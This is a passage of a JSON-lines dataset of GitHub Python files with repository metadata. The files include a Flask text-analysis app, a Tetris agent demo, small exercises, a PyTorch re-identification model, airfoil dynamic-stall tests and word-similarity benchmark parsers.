\"\n\n@app.route('/index')\ndef hello():\n return render_template('index.html')\n\n@app.route('/sentiment',methods=['POST'])\ndef sentiment():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT)\n sentiment = client.analyze_sentiment(request={'document': document}).document_sentiment\n # print(\"Text: {}\".format(text))\n #print(\"Sentiment: {}, {}\".format(sentiment.score, sentiment.magnitude))\n Sent=\"Undecided\"\n if sentiment.score > (.1) :\n Sent=\"Possitive\"\n elif sentiment.score < (-.1) :\n Sent=\"Negative\"\n else:\n Sent= \"Neutral\"\n resp = \"Sentiment: {} The score is: \".format(Sent) + str(round(sentiment.score,2)) + \", \" + str(round(sentiment.magnitude,2))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/entity',methods=['POST'])\ndef entity():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n encoding_type = language_v1.EncodingType.UTF8\n response = client.analyze_entities(request = {'document': document, 'encoding_type': encoding_type})\n resp=''\n for entity in response.entities:\n resp += \"Entity: {}\".format(entity.name) +\"--> \" + \"Entity type: {}\".format(language_v1.Entity.Type(entity.type_).name) + \"\\n\"\n print(\"Entity: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/class',methods=['POST'])\ndef classify():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n response = client.classify_text(request = {'document': document })\n resp=''\n for category in response.categories:\n resp+= u\"Category name: {}\".format(category.name) + \"--> \" + \"Confidence: {}\".format(round(category.confidence,2)) + \"\\n\"\n\n print(\"Class: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n\n@app.route('/summerize',methods=['POST'])\ndef summerize():\n if request.method == 'POST':\n\n client = language_v1.LanguageServiceClient()\n type_ = language_v1.Document.Type.PLAIN_TEXT\n\n language = \"en\"\n document = language_v1.Document(content=request.get_json()['payload'], type_=language_v1.Document.Type.PLAIN_TEXT, language= language)\n encoding_type = language_v1.EncodingType.UTF8\n response = client.classify_text(request = {'document': document})\n resp=''\n for category in response.categories:\n resp+= u\"Category name: {}\".format(category.name) + \" \" + \"Confidence: {}\".format(category.confidence) + \" \"\n\n print(\"Class: {}\".format(resp))\n response = {\"message\":resp}\n return jsonify(response)\n","repo_name":"alexmofidi/Flask_app","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23610551680","text":"import pygame\nfrom pygame.locals import QUIT\nfrom tetris.utils import read_yaml_file, initialize_pygame, draw\nfrom tetris.project_root_path import project_root_path\nfrom tetris.agent.agent import LinearAgent, NNAgent\nfrom tetris.environment.environment import TetrisEnvironment\nimport numpy as np\nfrom pathlib import Path\nimport pickle\nfrom typing import Dict, Any\nimport sys\n\n\ndef showcase_agent_play(config: Dict[str, Any]) -> None: # noqa\n trained_agent_path = project_root_path / Path(config[\"trained_agent_file_path\"])\n if config[\"agent_type\"] == \"linear\":\n agent = LinearAgent(np.load(trained_agent_path))\n elif config[\"agent_type\"] == \"nn\":\n with open(trained_agent_path, \"rb\") as f:\n agent = NNAgent(*pickle.load(f).values())\n else:\n raise RuntimeError(f\"Agent type '{agent}' not supported.\")\n\n env = TetrisEnvironment()\n\n display, clock, fps, rectangle_size, font = initialize_pygame(config[\"pygame_config\"])\n\n games_played = 0\n lines_cleared = 0\n\n while True:\n board_representations = env.return_board_representations()\n scored_representations = {k: agent.evaluate_state(v) for k, v in board_representations.items()}\n best_placement = max(scored_representations, key=scored_representations.get)\n target_rotation, target_x, target_y = best_placement\n while env.rotation != target_rotation or env.tetromino_x != target_x or env.tetromino_y != target_y:\n action = 0\n if action == 0 and env.rotation != target_rotation:\n env.rotation += 1\n action = 1\n if action == 0 and env.tetromino_x != target_x:\n if env.tetromino_x < target_x:\n env.tetromino_x += 1\n else:\n env.tetromino_x -= 1\n action = 1\n if action == 0 and env.tetromino_y != target_y:\n env.tetromino_y += 1\n action = 1\n draw(\n display=display,\n board=env.board,\n tetromino=env.tetromino,\n rotation=env.rotation,\n tetromino_x=env.tetromino_x,\n tetromino_y=env.tetromino_y,\n rectangle_size=rectangle_size,\n next_tetromino=env.next_tetromino,\n lines_cleared=lines_cleared,\n games_played=games_played,\n font=font,\n )\n clock.tick(fps)\n lines_cleared, games_played = env.process_best_placement(best_placement, lines_cleared, games_played)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n\ndef main():\n config = read_yaml_file(project_root_path / Path(\"config.yaml\"))\n showcase_agent_play(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chingismaksimov/tetris_v2","sub_path":"tetris/showcase_agent_play.py","file_name":"showcase_agent_play.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43034678526","text":"class Solution:\n def capitalizeTitle(self, title: str) -> str:\n title=title.lower()\n words=title.split()\n res=\"\"\n for word in words:\n if len(word)>2:\n word=word.title()\n res=res+word+\" \"\n return res[:-1]\n","repo_name":"SPFA-newbie/leet-code-answer","sub_path":"#2129.py","file_name":"#2129.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343624989","text":"#Cálculo del dígito verificador de un rut\nrut=input()\nrut=[int(rut[i]) for i in reversed(range(len(rut)))]\nmul=list(range(2,8))*2\nlistos=[rut[i]*mul[i] for i in range(len(rut))]\nn=sum(listos)%11\nif(n==0):\n\tprint('dv= 0')\nelif(n==1):\n\tprint('dv= k')\nelse:\n\tprint('dv=',11-n)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_6e92a933d2498847f9a1bdfbf87b6438.py","file_name":"hito1_ej5_6e92a933d2498847f9a1bdfbf87b6438.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35615731157","text":"n = int(input())\nif n < 0:\n n = abs(n)\n r = n % 100\n n //= 100\n digits = [int(d) for d in list(str(r))]\n if len(digits) == 1:\n digits.append(0)\n mini = min(digits)\n n = -1 * int(str(n) + str(mini))\nprint(n)\n","repo_name":"ciberdiego123/python-coding","sub_path":"Ilya_Bank_Account.py","file_name":"Ilya_Bank_Account.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11537422848","text":"import os\nimport glob\nimport scipy\nimport torch\nimport random\nimport numpy as np\nimport torchvision.transforms.functional as F\nfrom torch.utils.data import DataLoader\nfrom PIL import Image\nfrom scipy.misc.pilutil import imread, imsave\n# from imageio import imread, imsave\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\nfrom .utils import create_extrapolation_mask\nnp.set_printoptions(threshold=10000000)\nimport time\n\nclass Dataset(torch.utils.data.Dataset):\n def __init__(self, config, flist, augment=True, mask_type = None):\n super(Dataset, self).__init__()\n self.augment = augment\n self.data = self.load_flist(flist)\n self.loaded_img_size = config.LOADED_IMAGE_SIZE\n self.mask = mask_type\n if mask_type is None:\n self.mask = config.MASK\n \n # in test mode, there's a one-to-one relationship between mask and image\n # masks are loaded non random\n if config.MODE == 2:\n self.mask = 7\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n try:\n item = self.load_item(index)\n except:\n print('loading error: ' + self.data[index])\n item = self.load_item(0)\n\n return item\n\n def load_name(self, index):\n name = self.data[index]\n print('loading name...', name)\n return os.path.basename(name)\n\n def load_item(self, index):\n\n size = self.loaded_img_size # Assume the input imgs' height and width are the same.\n\n # load image\n img = imread(self.data[index])\n\n # gray to rgb\n if len(img.shape) < 3:\n img = gray2rgb(img)\n\n # resize/crop if needed\n if size != 0:\n img = self.resize(img, size, size)\n \n # load mask\n mask, mask_information = self.load_mask(size)\n mask = np.expand_dims(mask, axis=0)\n # mask_information = np.expand_dims(mask_information, axis=0)\n # augment data\n if self.augment and np.random.binomial(1, 0.5) > 0:\n img = img[:, ::-1, ...].copy()\n mask = mask[:, ::-1, ...].copy()\n mask_information = mask_information.copy() #[1,4]\n temp = mask_information[2] \n mask_information[2] = size - mask_information[3]\n mask_information[3] = size - temp\n # mask#####\n \n # print('Get dataset item...', torch.from_numpy(unlbl_binary_mask).float().shape, torch.from_numpy(unlbl_binary_mask).float())\n # return self.to_tensor(img), self.to_tensor(img_gray), (torch.from_numpy(semantic)).float(), (torch.from_numpy(unlbl_binary_mask)).float(), (torch.from_numpy(smt_one_hot)).float(), self.to_tensor(edge), (torch.from_numpy(mask)).float()\n return self.to_tensor(img), (torch.from_numpy(mask)).float(), torch.from_numpy(mask_information).float() \n # [3, 256, 256], [1, 256, 256], [1, 256, 256], [20, 256, 256], [1, 256, 256]\n \n\n def onehot_enc(self, smt):#smt.shape = [256, 256] #but if any pixel is unlbled, I set 19-dim vector to 0 vector. \n _, w, h = smt.shape\n # print('w,h =',w,h)\n smt_flat = smt.flatten()\n # print(smt_flat)\n voidpart = (smt_flat==self.ignore_index)\n nonvoid_pix = []\n for i in range(len(voidpart)):\n if voidpart[i] == 0:\n nonvoid_pix.append(i)\n\n # print('smt_flat.shape =',smt_flat.shape)\n onehot = np.zeros((w*h, self.NUM_CLASSES))\n onehot[nonvoid_pix, smt_flat[nonvoid_pix]] = 1\n # print('onehot.shape =',onehot.shape)\n onehot = onehot.reshape((w, h, self.NUM_CLASSES))\n onehot = np.transpose(onehot, (2,0,1)) \n return onehot \n\n def load_mask(self, size):######################################################### 做完去確定image dataset沒問題 就可以下去train了\n # print('load_mask, img.shape =', img.shape)#(256, 256, 3)\n mask_type = self.mask\n if mask_type == 1:\n top = np.random.randint(0, 128)#128-16\n bot = 128+top\n left = np.random.randint(0, 128)#128-16\n right = 128+left\n mask, mask_inf = create_extrapolation_mask(size, size, crop_pos=(top, bot, left, right))\n \n # extrapolation mask (middle white, periphery black) \n if mask_type == 2:\n mask, mask_inf = create_extrapolation_mask(size, size)\n \n return mask, mask_inf\n \n def to_tensor(self, img):\n img = Image.fromarray(img)\n img_t = F.to_tensor(img).float()\n return img_t\n\n def resize(self, img, height, width, centerCrop=True, mode=None):\n imgh, imgw = img.shape[0:2]\n\n if centerCrop and imgh != imgw:\n # center crop\n side = np.minimum(imgh, imgw)\n j = (imgh - side) // 2\n i = (imgw - side) // 2\n img = img[j+side//30:j + 29*side//30, i+side//30:i + 29*side//30, ...]\n\n img = scipy.misc.imresize(img, [height, width],interp='nearest', mode=mode)\n\n return img\n\n def load_flist(self, flist):\n if isinstance(flist, list):\n return flist\n\n # flist: image file path, image directory path, text file flist path\n if isinstance(flist, str):\n if os.path.isdir(flist):\n flist = list(glob.glob(flist + '/*.jpg')) + list(glob.glob(flist + '/*.png'))\n flist.sort()\n return flist\n\n if os.path.isfile(flist):\n try:\n return np.genfromtxt(flist, dtype=np.str, encoding='utf-8')\n except:\n return [flist]\n\n return []\n\n def create_iterator(self, batch_size):\n while True:\n sample_loader = DataLoader(\n dataset=self,\n batch_size=batch_size,\n drop_last=True\n )\n\n for item in sample_loader:\n yield item\n","repo_name":"tpbrandon01/Cool-Outpainting","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40674784500","text":"import logging\nimport os\nfrom unittest import TestCase\n\nimport numpy as np\nimport pytest\n\nfrom aspire.denoising import adaptive_support\nfrom aspire.source import ArrayImageSource\nfrom aspire.utils import gaussian_2d\n\nlogger = logging.getLogger(__name__)\n\nDATA_DIR = os.path.join(os.path.dirname(__file__), \"saved_test_data\")\n\n\nclass AdaptiveSupportTest(TestCase):\n def setUp(self):\n self.size = 1025\n self.sigma = 16\n self.n_disc = 10\n\n # Reference thresholds. Since we're integrating 2 * r * exp(-r ** 2 /\n # (2 * sigma ** 2)), the thresholds corresponding to one, two, and\n # three standard deviations are the following.\n self.references = {\n 1: 1 - np.exp(-1 / 2),\n 2: 1 - np.exp(-(2**2) / 2),\n 3: 1 - np.exp(-(3**2) / 2),\n }\n\n def testAdaptiveSupportBadThreshold(self):\n \"\"\"\n Method should raise meaningful error when passed unreasonable thresholds.\n \"\"\"\n\n discs = np.empty((self.size, self.size)) # Intentional Dummy Data\n img_src = ArrayImageSource(discs)\n\n with pytest.raises(ValueError, match=r\"Given energy_threshold.*\"):\n _ = adaptive_support(img_src, -0.5)\n\n with pytest.raises(ValueError, match=r\"Given energy_threshold.*\"):\n _ = adaptive_support(img_src, 9000)\n\n def testAdaptiveSupportIncorrectInput(self):\n \"\"\"\n Method should raise meaningful error when passed wrong format input.\n \"\"\"\n\n with pytest.raises(\n RuntimeError,\n match=\"adaptive_support expects `Source` instance or subclass.\",\n ):\n # Pass numpy array.\n _ = adaptive_support(np.empty((10, 32, 32)))\n\n def test_adaptive_support_F(self):\n \"\"\"\n Test Fourier support of Gaussian relates to normal distribution.\n \"\"\"\n\n # Generate stack of 2D Gaussian images.\n imgs = np.tile(\n gaussian_2d(self.size, sigma=self.sigma),\n (self.n_disc, 1, 1),\n )\n\n # Setup ImageSource like objects\n img_src = ArrayImageSource(imgs)\n\n for ref, threshold in self.references.items():\n c, R = adaptive_support(img_src, threshold)\n\n # Assert spatial support is close to normal.\n R_true = ref * self.sigma\n\n # Standard deviation in Fourier space is given by 1/(2 * pi *\n # sigma). This can be obtained by applying the Poisson summation\n # formula to the continuous FT which gives that the discrete FT is\n # well approximated by a Gaussian with that particular standard\n # deviation.\n c_true = ref / (2 * np.pi * self.sigma)\n\n # Since we're dealing with the square of the Gaussian, this\n # effectively divides the sigmas by sqrt(2).\n R_true /= np.sqrt(2)\n c_true /= np.sqrt(2)\n\n # Accuracy is not perfect, but within 5% if sigma is in the right\n # range (too small, R is inaccurate; too big, c is inaccurate.\n self.assertTrue(abs(R - R_true) / R_true < 0.05)\n self.assertTrue(abs(c - c_true) / c_true < 0.05)\n","repo_name":"ComputationalCryoEM/ASPIRE-Python","sub_path":"tests/test_adaptive_support.py","file_name":"test_adaptive_support.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"77"} +{"seq_id":"6022522039","text":"from set1.challenge3 import decode_single_xor\n# read file line by line\nfd = open(\"ch4.txt\", \"r\")\nlines = fd.readlines()\nfinal_result = []\nfor item in lines:\n print(item)\n result = decode_single_xor(item[:-1])\n final_result += result\nfor item in final_result:\n print(f'{bytes.fromhex(item[0])}: {item[1]}')\n","repo_name":"Atomnp/cryptopals","sub_path":"set1/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73195890808","text":"from __future__ import absolute_import\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nfrom torchvision import models\n\n__all__ = ['PCB']\n\n\ndef weights_init_kaiming(m):\n classname = m.__class__.__name__\n if classname.find('Conv2d') != -1:\n init.kaiming_normal_(m.weight.data, mode='fan_out', nonlinearity='relu')\n elif classname.find('Linear') != -1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_out')\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm1d') != -1:\n init.normal(m.weight.data, 1.0, 0.02)\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm2d') != -1:\n init.constant(m.weight.data, 1)\n init.constant(m.bias.data, 0)\n\n\ndef weights_init_classifier(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n init.normal(m.weight.data, std=0.001)\n init.constant(m.bias.data, 0.0)\n\n\n# Defines the new fc layer and classification layer\n# |--Linear--|--bn--|--relu--|--Linear--|\nclass ClassBlock(nn.Module):\n def __init__(self, input_dim, class_num, relu=True, num_bottleneck=512):\n super(ClassBlock, self).__init__()\n add_block = []\n\n add_block += [nn.Conv2d(input_dim, num_bottleneck, kernel_size=1, bias=False)]\n add_block += [nn.BatchNorm2d(num_bottleneck)]\n if relu:\n add_block += [nn.ReLU(inplace=True)]\n add_block = nn.Sequential(*add_block)\n add_block.apply(weights_init_kaiming)\n\n classifier = []\n classifier += [nn.Linear(num_bottleneck, class_num)]\n classifier = nn.Sequential(*classifier)\n classifier.apply(weights_init_classifier)\n\n self.add_block = add_block\n self.classifier = classifier\n\n def forward(self, x):\n x = self.add_block(x)\n x = torch.squeeze(x)\n x = self.classifier(x)\n return x\n\n\n# Part Model proposed in Yifan Sun etal. (2018)\nclass PCB(nn.Module):\n def __init__(self, num_classes, pretrained=True):\n super(PCB, self).__init__()\n self.part = 6\n # resnet50\n resnet = models.resnet50(pretrained=pretrained)\n # remove the final downsample\n resnet.layer4[0].downsample[0].stride = (1, 1)\n resnet.layer4[0].conv2.stride = (1, 1)\n modules = list(resnet.children())[:-2]\n self.backbone = nn.Sequential(*modules)\n self.avgpool = nn.AdaptiveAvgPool2d((self.part, 1))\n self.dropout = nn.Dropout(p=0.5)\n\n # define 6 classifiers\n self.classifiers = nn.ModuleList()\n for i in range(self.part):\n self.classifiers.append(ClassBlock(2048, num_classes, True, 256))\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.avgpool(x)\n x = self.dropout(x)\n part = {}\n predict = {}\n # get six part feature batchsize*2048*6\n for i in range(self.part):\n part[i] = x[:, :, i, :]\n part[i] = torch.unsqueeze(part[i], 3)\n predict[i] = self.classifiers[i].add_block(part[i]) # 6*256-dim\n\n scores, features = [], []\n for i in range(self.part):\n scores.append(predict[i].view(predict[i].shape[0], -1)) # id-class or 1536\n return torch.cat(scores, 1) # 1536-dim\n\n\nclass PCBTrain(nn.Module):\n def __init__(self, num_classes, pretrained=True):\n super(PCBTrain, self).__init__()\n self.part = 6\n # resnet50\n resnet = models.resnet50(pretrained=pretrained)\n # remove the final downsample\n resnet.layer4[0].downsample[0].stride = (1, 1)\n resnet.layer4[0].conv2.stride = (1, 1)\n modules = list(resnet.children())[:-2]\n self.backbone = nn.Sequential(*modules)\n self.avgpool = nn.AdaptiveAvgPool2d((self.part, 1))\n self.dropout = nn.Dropout(p=0.5)\n\n # define 6 classifiers\n self.classifiers = nn.ModuleList()\n for i in range(self.part):\n self.classifiers.append(ClassBlock(2048, num_classes, True, 256))\n\n def forward(self, x):\n x = self.backbone(x)\n x = self.avgpool(x)\n x = self.dropout(x)\n part = {}\n predict = {}\n # get six part feature batchsize*2048*6\n for i in range(self.part):\n part[i] = x[:, :, i, :]\n part[i] = torch.unsqueeze(part[i], 3)\n predict[i] = self.classifiers[i](part[i]) # 6*256-dim\n\n scores, features = [], []\n for i in range(self.part):\n scores.append(predict[i].view(predict[i].shape[0], -1))\n features.append(part[i].view(predict[i].shape[0], -1))\n return features, scores # 1536-dim\n","repo_name":"FlyingRoastDuck/MetaAttack_AAAI21","sub_path":"reid/models/PCB.py","file_name":"PCB.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"18845830049","text":"import cv2\nfrom keras.preprocessing.image import ImageDataGenerator\nimport sys\nimport os\n\n\npics = 5\ndatagen = ImageDataGenerator(\n zca_whitening=False,\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest')\n\ndef gen(folder):\n all_files = os.listdir(folder)\n for f in all_files:\n filename = folder + \"/\" + f\n im = cv2.imread(filename)\n im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)\n im = im.reshape((1,) + im.shape)\n #print(im.shape)\n count = 0\n for b in datagen.flow(im, batch_size=1, save_to_dir=folder, save_prefix=f.split(\".\")[0]):\n count += 1\n if count > pics:\n break\n\n\nif __name__ == \"__main__\":\n gen(sys.argv[1])\n","repo_name":"sepfy/tensorflow-tools","sub_path":"da.py","file_name":"da.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45453569616","text":"import unittest\r\nimport numpy as np\r\nimport os\r\nMyDir=os.path.dirname(__file__)\r\n\r\nfrom scipy.integrate import solve_ivp\r\n\r\nfrom welib.airfoils.Polar import Polar\r\nfrom welib.airfoils.DynamicStall import * \r\n\r\n# --------------------------------------------------------------------------------}\r\n# --- \r\n# --------------------------------------------------------------------------------{\r\nclass TestDynamicStall(unittest.TestCase):\r\n def assertNaN(self,x):\r\n self.assertTrue(np.isnan(x))\r\n\r\n def test_oye(self):\r\n #FFA-W3-241 airfoil Dyna Stall\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True)\r\n\r\n omega = 12.57\r\n T = 2*np.pi/omega\r\n tau = 0.08\r\n alpham = 20\r\n dt = 0.01 # time step\r\n # \r\n fs_prev = P.fs_interp(alpham) # init with steady value\r\n Cl0 = P.cl_interp(alpham) # init with steady value\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham,tau,fs_prev,dt)\r\n\r\n # Testing that value at t=0 is equal to the steady state cl\r\n np.testing.assert_almost_equal(Cl_new, Cl0, decimal=4)\r\n self.assertEqual(fs_prev_new,fs_prev)\r\n\r\n # An increase of alpha from the steady value should have dCl/dt>0\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham+1,tau,fs_prev,dt)\r\n self.assertEqual( (Cl_new-Cl0)>0 ,True)\r\n self.assertEqual( (fs_prev_new-fs_prev)<0 ,True)\r\n\r\n # A decrease of alpha from the steady value should have dCl/dt<0\r\n Cl_new,fs_prev_new = P.dynaStallOye_DiscreteStep(alpham-1,tau,fs_prev,dt)\r\n self.assertEqual( (Cl_new-Cl0)<0 ,True)\r\n self.assertEqual( (fs_prev_new-fs_prev)>0 ,True)\r\n\r\n\r\n def test_convergence(self):\r\n # Starting from a wrong set point, the Cl value should converge to the steady Cl value\r\n # Script params, reading polar\r\n radians=True\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True, radians=radians)\r\n U0, chord = 10, 0.1591\r\n alpha_st = 3 * P._alpha0 \r\n tau_t = np.linspace(0,40,30)\r\n vt = chord * tau_t / (2*U0)\r\n \r\n # Oye's Parameters\r\n p_oye = dynstall_oye_param_from_polar(P, tau_chord=chord/U0)\r\n p_mhh = dynstall_mhh_param_from_polar(P, chord, constants='OpenFAST')\r\n # Inputs\r\n u=dict()\r\n u['U'] = lambda t: U0\r\n u['U_dot'] = lambda t: 0 \r\n u['alpha'] = lambda t: alpha_st\r\n u['omega'] = lambda t: 0\r\n u['alpha_34'] = u['alpha']\r\n\r\n # Init values, off\r\n y0_oye = [0]\r\n y0_mhh = [0,0,0,0]\r\n\r\n Cl_mhh = np.zeros(len(vt))\r\n Cl_oye = np.zeros(len(vt))\r\n ## Integration using solve_ivp\r\n np.seterr(under='ignore')\r\n sol_mhh = solve_ivp(lambda t,x: dynstall_mhh_dxdt(t,x,u,p_mhh), t_span=[0, max(vt)], y0=y0_mhh, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_mhh[it],_,_ = dynstall_mhh_outputs(t,sol_mhh.y[:,it],u,p_mhh)\r\n\r\n ## Integration using solve_ivp\r\n sol_oye = solve_ivp(lambda t,x: dynstall_oye_dxdt(t,x,u,p_oye), t_span=[0, max(vt)], y0=y0_oye, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_oye[it] = dynstall_oye_output(vt[it],sol_oye.y[0,it],u,p_oye)\r\n\r\n ## Steady values\r\n Cl_st = P.cl_interp(alpha_st)\r\n fs_st = P.fs_interp(alpha_st) \r\n\r\n ## --- Test that the last value is the steady state one\r\n np.testing.assert_almost_equal(Cl_mhh[-1], Cl_st, decimal=3)\r\n np.testing.assert_almost_equal(Cl_oye[-1], Cl_st, decimal=3)\r\n np.testing.assert_almost_equal(sol_oye.y[0,-1], fs_st, decimal=3)\r\n\r\n # --- Plot, keep me\r\n #import matplotlib.pyplot as plt\r\n #fig=plt.figure()\r\n #ax = fig.add_subplot(111)\r\n #ax.plot(tau_t,Cl_mhh[:]/Cl_st ,'--',label = 'Cl dynamic (MHH)')\r\n #ax.plot(tau_t,Cl_oye[:]/Cl_st ,'-' ,label = 'Cl dynamic (Oye)')\r\n #ax.set_xlabel('Dimensionless time [-]')\r\n #ax.set_ylabel('Cl [-]')\r\n #plt.legend()\r\n #plt.show()\r\n\r\n # \r\n #y0_mhh = dynstall_mhh_steady(0,u,p_mhh)\r\n\r\n\r\n def test_mhh_wagner_step(self):\r\n # Step from alpha0 to alpha0+2, testing the circulatory response (history), \r\n # The Cl result is compared to Wagner's function\r\n radians=True # <<<\r\n P=Polar(os.path.join(MyDir,'../data/FFA-W3-241-Re12M.dat'), compute_params=True, radians=radians)\r\n\r\n U0, chord = 10, 0.1591\r\n alpha1 = P._alpha0 \r\n alpha2 = alpha1+2*np.pi/180\r\n tau_t = np.linspace(0,30,100)\r\n vt = chord * tau_t / (2*U0)\r\n\r\n ## MHH Parameters and Inputs\r\n np.seterr(under='ignore')\r\n p = dynstall_mhh_param_from_polar(P, chord, constants='Jones')\r\n u=dict()\r\n u['U'] = lambda t: U0\r\n u['U_dot'] = lambda t: 0 \r\n u['alpha'] = lambda t: alpha1 if t<=0 else alpha2 \r\n u['omega'] = lambda t: 0\r\n u['alpha_34'] = u['alpha']\r\n ## Steady values\r\n Cl_st2 = P.cl_interp(alpha2)\r\n y0_mhh = dynstall_mhh_steady(0,u,p)\r\n\r\n Cl_mhh = np.zeros(len(vt))\r\n # Integration using solve_ivp\r\n sol_mhh = solve_ivp(lambda t,x: dynstall_mhh_dxdt(t,x,u,p), t_span=[0, max(vt)], y0=y0_mhh, t_eval=vt)\r\n for it,t in enumerate(vt):\r\n Cl_mhh[it],_,_ = dynstall_mhh_outputs(t,sol_mhh.y[:,it],u,p)\r\n\r\n Cl_wag_Jones=wagner(tau_t, constants='Jones')\r\n\r\n np.testing.assert_almost_equal(Cl_mhh[1:]/Cl_st2,Cl_wag_Jones[1:],decimal=4)\r\n\r\n # --- Plot, keep me\r\n #import matplotlib.pyplot as plt\r\n #fig=plt.figure()\r\n #ax = fig.add_subplot(111)\r\n #ax.plot(tau_t ,Cl_wag_Jones,'k' ,label='Wagner function (Jones approx.)')\r\n #ax.plot(tau_t[1:],Cl_mhh[1:]/Cl_st2 ,'--',label = 'Cl dynamic (MHH)')\r\n #ax.set_xlabel('Dimensionless time 2 U_0 t/c [-]')\r\n #ax.set_ylabel('Cl/Cl_ref [-]')\r\n #plt.ylim([0.3,1.1])\r\n #plt.title('Response to an angle of attack change')\r\n #plt.legend()\r\n #plt.show()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"ebranlard/welib","sub_path":"welib/airfoils/tests/test_dynamic_stall.py","file_name":"test_dynamic_stall.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"77"} +{"seq_id":"5300980529","text":"'''\nCreated on Apr 27, 2018\n\n@author: terry\n'''\nimport os\nfrom default import bench_data\nfrom default import semantic_parser as sp\n#===============================================================================\n# INPUT TEXT PROCESSMENT\n#===============================================================================\ndef process_ws353(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0],block[1],float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of ws353 data from 0.0 to 10.0\n\ndef process_rg65(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(';') #delimiter\n tmp_token = bench_data.Token_Data(block[0],block[1],float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of rg65 data 0.0 to 4.0\n\ndef process_simlex999(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split('\\t') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[3].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of simlex999 linear mapped from 0 to 6 -> 0.0 to 10.0 - only same pos are comapred\n\ndef process_men(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(' ') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of MEN linear mapped from 1 to 7\n\ndef process_mc28(file):\n tokens_list = []\n print('Processing %s' %file)\n with open(file, 'r', encoding='utf-8') as fin:\n for line in fin:\n block = line.split(';') #delimiter\n tmp_token = bench_data.Token_Data(block[0], block[1], float(block[2].strip('\\n')))\n tokens_list.append(tmp_token)\n return(tokens_list)\n#creates a list of MC28 linear mapped from 0 to 4\n\ndef process_yp130(file):\n 